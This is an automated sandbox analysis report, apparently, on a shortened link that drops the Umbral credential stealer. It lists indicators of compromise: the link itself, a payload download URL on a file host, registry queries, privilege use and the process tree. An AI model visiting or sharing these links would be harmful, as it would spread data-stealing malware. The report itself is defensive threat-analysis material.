umbral | hxxps://shorturl[.]at/efhlC

Analysis

max time kernel
152s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20231025-en
resource tags

arch:x64arch:x86image:win10v2004-20231025-enlocale:en-usos:windows10-2004-x64system
submitted
30-10-2023 13:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://shorturl.at/efhlC

Score

10^/10

umbral stealer

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://pixeldrain.com/api/file/aBxifE6Wdownload

Signatures

Detect Umbral payload 1 IoCs

resource	yara_rule
behavioral1/memory/5392-122-0x0000025715E10000-0x0000025715E50000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Downloads MZ/PE file

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	notepad.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads"	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	notepad.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads"	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1"	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	notepad.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2"	notepad.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257"	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	notepad.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents"	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0000000001000000ffffffff	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1"	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	notepad.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	notepad.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 010000000200000000000000ffffffff	notepad.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
5964	powershell.exe
5964	powershell.exe
5964	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
5188	notepad.exe
6044	notepad.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3200	firefox.exe
Token: SeDebugPrivilege	3200	firefox.exe
Token: SeDebugPrivilege	5964	powershell.exe
Token: SeDebugPrivilege	5392	Xray.exe
Token: SeIncreaseQuotaPrivilege	5600	wmic.exe
Token: SeSecurityPrivilege	5600	wmic.exe
Token: SeTakeOwnershipPrivilege	5600	wmic.exe
Token: SeLoadDriverPrivilege	5600	wmic.exe
Token: SeSystemProfilePrivilege	5600	wmic.exe
Token: SeSystemtimePrivilege	5600	wmic.exe
Token: SeProfSingleProcessPrivilege	5600	wmic.exe
Token: SeIncBasePriorityPrivilege	5600	wmic.exe
Token: SeCreatePagefilePrivilege	5600	wmic.exe
Token: SeBackupPrivilege	5600	wmic.exe
Token: SeRestorePrivilege	5600	wmic.exe
Token: SeShutdownPrivilege	5600	wmic.exe
Token: SeDebugPrivilege	5600	wmic.exe
Token: SeSystemEnvironmentPrivilege	5600	wmic.exe
Token: SeRemoteShutdownPrivilege	5600	wmic.exe
Token: SeUndockPrivilege	5600	wmic.exe
Token: SeManageVolumePrivilege	5600	wmic.exe
Token: 33	5600	wmic.exe
Token: 34	5600	wmic.exe
Token: 35	5600	wmic.exe
Token: 36	5600	wmic.exe
Token: SeIncreaseQuotaPrivilege	5600	wmic.exe
Token: SeSecurityPrivilege	5600	wmic.exe
Token: SeTakeOwnershipPrivilege	5600	wmic.exe
Token: SeLoadDriverPrivilege	5600	wmic.exe
Token: SeSystemProfilePrivilege	5600	wmic.exe
Token: SeSystemtimePrivilege	5600	wmic.exe
Token: SeProfSingleProcessPrivilege	5600	wmic.exe
Token: SeIncBasePriorityPrivilege	5600	wmic.exe
Token: SeCreatePagefilePrivilege	5600	wmic.exe
Token: SeBackupPrivilege	5600	wmic.exe
Token: SeRestorePrivilege	5600	wmic.exe
Token: SeShutdownPrivilege	5600	wmic.exe
Token: SeDebugPrivilege	5600	wmic.exe
Token: SeSystemEnvironmentPrivilege	5600	wmic.exe
Token: SeRemoteShutdownPrivilege	5600	wmic.exe
Token: SeUndockPrivilege	5600	wmic.exe
Token: SeManageVolumePrivilege	5600	wmic.exe
Token: 33	5600	wmic.exe
Token: 34	5600	wmic.exe
Token: 35	5600	wmic.exe
Token: 36	5600	wmic.exe
Token: SeDebugPrivilege	3200	firefox.exe
Token: SeDebugPrivilege	3200	firefox.exe
Token: SeDebugPrivilege	3200	firefox.exe
Token: SeDebugPrivilege	5984	Xray.exe
Token: SeIncreaseQuotaPrivilege	4924	wmic.exe
Token: SeSecurityPrivilege	4924	wmic.exe
Token: SeTakeOwnershipPrivilege	4924	wmic.exe
Token: SeLoadDriverPrivilege	4924	wmic.exe
Token: SeSystemProfilePrivilege	4924	wmic.exe
Token: SeSystemtimePrivilege	4924	wmic.exe
Token: SeProfSingleProcessPrivilege	4924	wmic.exe
Token: SeIncBasePriorityPrivilege	4924	wmic.exe
Token: SeCreatePagefilePrivilege	4924	wmic.exe
Token: SeBackupPrivilege	4924	wmic.exe
Token: SeRestorePrivilege	4924	wmic.exe
Token: SeShutdownPrivilege	4924	wmic.exe
Token: SeDebugPrivilege	4924	wmic.exe
Token: SeSystemEnvironmentPrivilege	4924	wmic.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
3200	firefox.exe
3200	firefox.exe
3200	firefox.exe
3200	firefox.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
3200	firefox.exe
3200	firefox.exe
3200	firefox.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
3200	firefox.exe
5188	notepad.exe
5188	notepad.exe
6044	notepad.exe
6044	notepad.exe
6044	notepad.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3244 wrote to memory of 3200	3244	firefox.exe	36
PID 3244 wrote to memory of 3200	3244	firefox.exe	36
PID 3244 wrote to memory of 3200	3244	firefox.exe	36
PID 3244 wrote to memory of 3200	3244	firefox.exe	36
PID 3244 wrote to memory of 3200	3244	firefox.exe	36
PID 3244 wrote to memory of 3200	3244	firefox.exe	36
PID 3244 wrote to memory of 3200	3244	firefox.exe	36
PID 3244 wrote to memory of 3200	3244	firefox.exe	36
PID 3244 wrote to memory of 3200	3244	firefox.exe	36
PID 3244 wrote to memory of 3200	3244	firefox.exe	36
PID 3244 wrote to memory of 3200	3244	firefox.exe	36
PID 3200 wrote to memory of 488	3200	firefox.exe	88
PID 3200 wrote to memory of 488	3200	firefox.exe	88
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 1624	3200	firefox.exe	89
PID 3200 wrote to memory of 2192	3200	firefox.exe	90
PID 3200 wrote to memory of 2192	3200	firefox.exe	90
PID 3200 wrote to memory of 2192	3200	firefox.exe	90

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://shorturl.at/efhlC"
1⤵
- Suspicious use of WriteProcessMemory
PID:3244
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://shorturl.at/efhlC
  2⤵
  - Checks processor information in registry
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3200
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3200.0.312653065\1231718121" -parentBuildID 20221007134813 -prefsHandle 1876 -prefMapHandle 1868 -prefsLen 20938 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {398bf93a-6a8c-4fb5-a119-48eb67d60ecd} 3200 "\\.\pipe\gecko-crash-server-pipe.3200" 1956 1c0f6dbbf58 gpu
    3⤵
    PID:488
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3200.1.2011775619\1309970480" -parentBuildID 20221007134813 -prefsHandle 2372 -prefMapHandle 2368 -prefsLen 21754 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {68b7d6a4-07ff-437d-ba78-2ff106ca10ab} 3200 "\\.\pipe\gecko-crash-server-pipe.3200" 2384 1c0f68e5c58 socket
    3⤵
    PID:1624
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3200.2.459216850\2146790435" -childID 1 -isForBrowser -prefsHandle 2948 -prefMapHandle 3184 -prefsLen 21857 -prefMapSize 232675 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {36c37fad-111b-4ac7-9c94-fe8b4ae111a9} 3200 "\\.\pipe\gecko-crash-server-pipe.3200" 3200 1c0fac14e58 tab
    3⤵
    PID:2192
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3200.3.2003377194\2068366276" -childID 2 -isForBrowser -prefsHandle 3664 -prefMapHandle 3660 -prefsLen 26437 -prefMapSize 232675 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {01bcedd1-57a8-4848-9d62-bf73d3508f22} 3200 "\\.\pipe\gecko-crash-server-pipe.3200" 3676 1c0fbcfb558 tab
    3⤵
    PID:456
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3200.4.1281990924\1305793623" -childID 3 -isForBrowser -prefsHandle 4944 -prefMapHandle 4940 -prefsLen 26496 -prefMapSize 232675 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {329b40fc-bf7e-4a6c-82d5-68ac92aee179} 3200 "\\.\pipe\gecko-crash-server-pipe.3200" 4936 1c0f8f1cd58 tab
    3⤵
    PID:4208
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3200.5.392453446\418181726" -childID 4 -isForBrowser -prefsHandle 5112 -prefMapHandle 5116 -prefsLen 26496 -prefMapSize 232675 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {852af46e-250f-49ec-8736-100b1711d966} 3200 "\\.\pipe\gecko-crash-server-pipe.3200" 5004 1c0f8f1b858 tab
    3⤵
    PID:3828
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3200.6.208438860\380484741" -childID 5 -isForBrowser -prefsHandle 5324 -prefMapHandle 5328 -prefsLen 26496 -prefMapSize 232675 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1de773e1-4f9a-4d85-b89f-44bd79f11f3f} 3200 "\\.\pipe\gecko-crash-server-pipe.3200" 5316 1c0f8f1c158 tab
    3⤵
    PID:5064
- - C:\Program Files\Mozilla Firefox\firefox.exe
